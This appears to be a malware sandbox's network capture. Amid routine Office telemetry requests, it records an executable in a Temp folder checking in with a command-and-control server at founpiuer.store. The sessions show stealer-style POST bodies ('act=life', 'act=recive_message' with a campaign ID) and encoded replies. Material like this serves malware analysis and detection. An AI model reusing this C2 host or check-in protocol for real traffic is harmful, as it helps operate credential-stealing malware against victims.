2024-11-07 03:13:23 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:23 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:23 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: 9f0c8f5e-f01e-0020-2b6b-2e956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031323Z-15869dbbcc6zbpm7hC1DFW75xg00000000u000000000brnh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:23 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	49906	104.21.5.155	443	1780	C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:23 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: founpiuer.store
2024-11-07 03:13:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-07 03:13:24 UTC	560	IN	HTTP/1.1 403 Forbidden Date: Thu, 07 Nov 2024 03:13:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2BUaYVwUDAenbtR%2FT3h5ZEKLpEOdw8Bi8jlh6UM6Y9RZm46%2FWfPovkrqUOWny%2F9MvUKEvqdCeN7rsuOG%2FnT8SB96VsaIYrxlxa%2B90fAHaKG4udAWH43IUCkR9uMMI5juTz4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dea25ad183d2e17-DFW
2024-11-07 03:13:24 UTC	809	IN	Data Raw: 31 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1154<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-11-07 03:13:24 UTC	1369	IN	Data Raw: 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 Data Ascii: i/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementB
2024-11-07 03:13:24 UTC	1369	IN	Data Raw: 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: s-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
2024-11-07 03:13:24 UTC	897	IN	Data Raw: 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e Data Ascii: </span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landin
2024-11-07 03:13:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	49910	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:24 UTC	192	OUT	GET /rules/rule702151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:24 UTC	517	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:24 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE156D2EE" x-ms-request-id: 524ac160-c01e-007a-69d2-2cb877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031324Z-16547b76f7fj5p7mhC1DFWf8w400000007pg00000000aabu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:24 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	49909	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:24 UTC	192	OUT	GET /rules/rule701350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:24 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:24 GMT Content-Type: text/xml Content-Length: 1370 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE62E0AB" x-ms-request-id: 43525779-601e-003e-2ed2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031324Z-16547b76f7f67wxlhC1DFWah9w00000007g000000000ggda x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:24 UTC	1370	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	49908	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:24 UTC	192	OUT	GET /rules/rule701351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:24 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:24 GMT Content-Type: text/xml Content-Length: 1407 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE687B46A" x-ms-request-id: fda52046-a01e-001e-025c-2e49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031324Z-15869dbbcc6gt87nhC1DFWh9un0000000830000000002phy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:24 UTC	1407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	49911	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:24 UTC	192	OUT	GET /rules/rule702150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:24 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:24 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT ETag: "0x8DC582BEDC8193E" x-ms-request-id: 14bed983-701e-0050-735c-2e6767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031324Z-15869dbbcc6qwghvhC1DFWssds00000003xg00000000p249 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:24 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	49907	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:24 UTC	192	OUT	GET /rules/rule702550v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:24 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:24 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE584C214" x-ms-request-id: 9107b392-201e-0000-7e01-2fa537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031324Z-17df447cdb5zfhrmhC1DFWh33000000003s0000000006u8d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:24 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.4	49916	104.21.5.155	443	1780	C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:24 UTC	352	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=egRvdYsNH9epRJdk1IM6bHBSN74tfpFRI2mWFHBdc2A-1730949204-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: founpiuer.store
2024-11-07 03:13:24 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-11-07 03:13:25 UTC	1006	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q5c74tq70vn6q36m1rgk2sleth; expires=Sun, 02-Mar-2025 21:00:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1g8dqjybWzciDPAHpU72uE4J4mWIY2tAlayX5MslAJDdjXqfAgbGW3ymvS0RSdDol4ge3COlXdV4KzdfVjYw3uoVrrBXc74v6ix74vltkzblRbG4D%2BS1HQyMDGUZcWrz7a4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dea25b2e8c4284b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1328&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1040&delivery_rate=2222563&cwnd=229&unsent_bytes=0&cid=15df2e0053aaa204&ts=781&x=0"
2024-11-07 03:13:25 UTC	363	IN	Data Raw: 34 64 39 0d 0a 70 65 4a 79 46 4a 44 4d 54 36 52 62 58 41 61 51 63 74 79 70 49 32 74 43 6c 56 48 4c 74 45 52 6d 69 4d 76 4a 7a 45 6a 38 6b 7a 4c 65 77 41 51 32 71 76 68 6a 68 69 67 35 4a 4b 6f 47 72 74 78 47 52 32 44 30 4e 65 6d 4f 49 67 66 6b 75 4b 7a 67 61 6f 72 2b 45 4a 2b 45 45 33 6a 6a 71 57 4f 47 50 69 51 6b 71 69 6d 6e 69 30 59 46 59 4b 39 7a 72 74 34 6d 42 2b 53 70 71 4b 63 6e 6a 50 39 52 7a 59 34 56 66 50 57 76 4b 38 55 33 4d 57 50 31 46 37 33 44 54 51 49 76 2f 54 7a 70 6d 47 59 44 38 75 6e 7a 37 67 57 5a 35 31 50 6f 67 77 46 2f 73 72 46 6a 33 33 6b 35 61 4c 4a 49 2f 73 68 47 43 53 37 7a 4e 61 44 63 4c 41 37 73 71 4b 32 6d 4f 4a 58 31 57 73 32 41 46 6e 33 2f 70 6a 2f 49 50 54 5a 6f 38 78 32 39 69 77 39 4a 4a 2b 39 7a 38 5a 5a 31 4e 75 6d 34 75 72 Data Ascii: 4d9peJyFJDMT6RbXAaQctypI2tClVHLtERmiMvJzEj8kzLewAQ2qvhjhig5JKoGrtxGR2D0NemOIgfkuKzgaor+EJ+EE3jjqWOGPiQkqimni0YFYK9zrt4mB+SpqKcnjP9RzY4VfPWvK8U3MWP1F73DTQIv/TzpmGYD8unz7gWZ51PogwF/srFj33k5aLJI/shGCS7zNaDcLA7sqK2mOJX1Ws2AFn3/pj/IPTZo8x29iw9JJ+9z8ZZ1Num4ur
2024-11-07 03:13:25 UTC	885	IN	Data Raw: 4b 31 77 6b 77 45 49 50 6f 35 70 74 55 6d 41 2b 43 6a 70 4b 51 75 6b 2f 78 57 78 34 42 51 4f 4c 4b 70 4e 59 5a 68 66 6b 66 33 41 4c 6e 48 56 30 73 61 74 79 7a 6e 7a 32 59 44 35 75 6e 7a 37 69 4b 62 38 6c 50 4d 6a 78 4e 2b 2b 62 77 74 31 44 38 7a 59 65 41 57 75 38 56 4c 43 6a 4c 39 50 61 2f 56 4c 77 2f 6a 72 4b 79 71 61 74 43 78 56 39 2f 41 53 44 62 54 6f 79 62 4b 4d 79 6c 6b 73 67 2f 77 30 67 45 4f 4c 4c 64 72 36 64 49 6e 41 4f 75 74 70 61 41 75 6b 76 64 65 79 6f 38 57 66 50 4b 70 4a 38 34 78 50 32 6e 35 48 37 37 4f 54 41 30 6d 2b 7a 4b 73 6c 6d 68 45 37 62 48 72 39 6d 71 77 39 6c 50 56 77 69 56 31 2f 4b 41 71 30 48 6b 68 4b 75 74 51 75 63 63 42 55 57 44 35 4e 71 62 45 4a 78 62 76 70 37 6d 69 4c 35 6a 38 55 38 6d 41 46 58 48 2f 6f 43 76 42 4f 6a 5a 67 38 Data Ascii: K1wkwEIPo5ptUmA+CjpKQuk/xWx4BQOLKpNYZhfkf3ALnHV0satyznz2YD5unz7iKb8lPMjxN++bwt1D8zYeAWu8VLCjL9Pa/VLw/jrKyqatCxV9/ASDbToybKMylksg/w0gEOLLdr6dInAOutpaAukvdeyo8WfPKpJ84xP2n5H77OTA0m+zKslmhE7bHr9mqw9lPVwiV1/KAq0HkhKutQuccBUWD5NqbEJxbvp7miL5j8U8mAFXH/oCvBOjZg8
2024-11-07 03:13:25 UTC	1369	IN	Data Raw: 32 38 65 37 0d 0a 33 4c 32 6f 79 4c 50 4d 44 64 32 2b 42 79 77 32 55 77 44 4a 66 6b 2f 72 4e 6b 6d 42 65 75 6e 6f 61 56 71 30 4c 46 58 33 38 42 49 4e 74 32 6a 50 64 51 7a 4e 58 57 77 4a 62 33 46 54 77 34 32 74 79 7a 6e 7a 32 59 44 35 75 6e 7a 37 69 47 59 2f 56 7a 48 68 67 4a 34 2f 62 77 6e 31 44 30 77 59 50 34 65 74 38 5a 4f 44 44 4c 7a 4d 37 76 58 49 77 50 6b 70 4c 6d 72 61 74 43 78 56 39 2f 41 53 44 62 49 6d 69 72 57 4b 44 6b 6d 78 78 4f 77 78 55 59 66 59 4f 68 39 73 4a 59 68 43 4b 72 78 36 36 30 6d 6b 2f 68 56 79 4a 49 61 65 76 4f 38 4b 73 38 77 4e 47 58 38 48 37 58 48 52 42 73 72 2b 44 75 6d 31 79 73 4a 34 61 32 72 37 6d 54 65 39 6b 69 48 32 46 42 58 2f 36 45 2f 78 53 68 38 55 66 45 65 73 4d 78 58 53 54 2b 35 4b 75 6e 52 4b 6b 53 79 36 61 71 69 4a 70 Data Ascii: 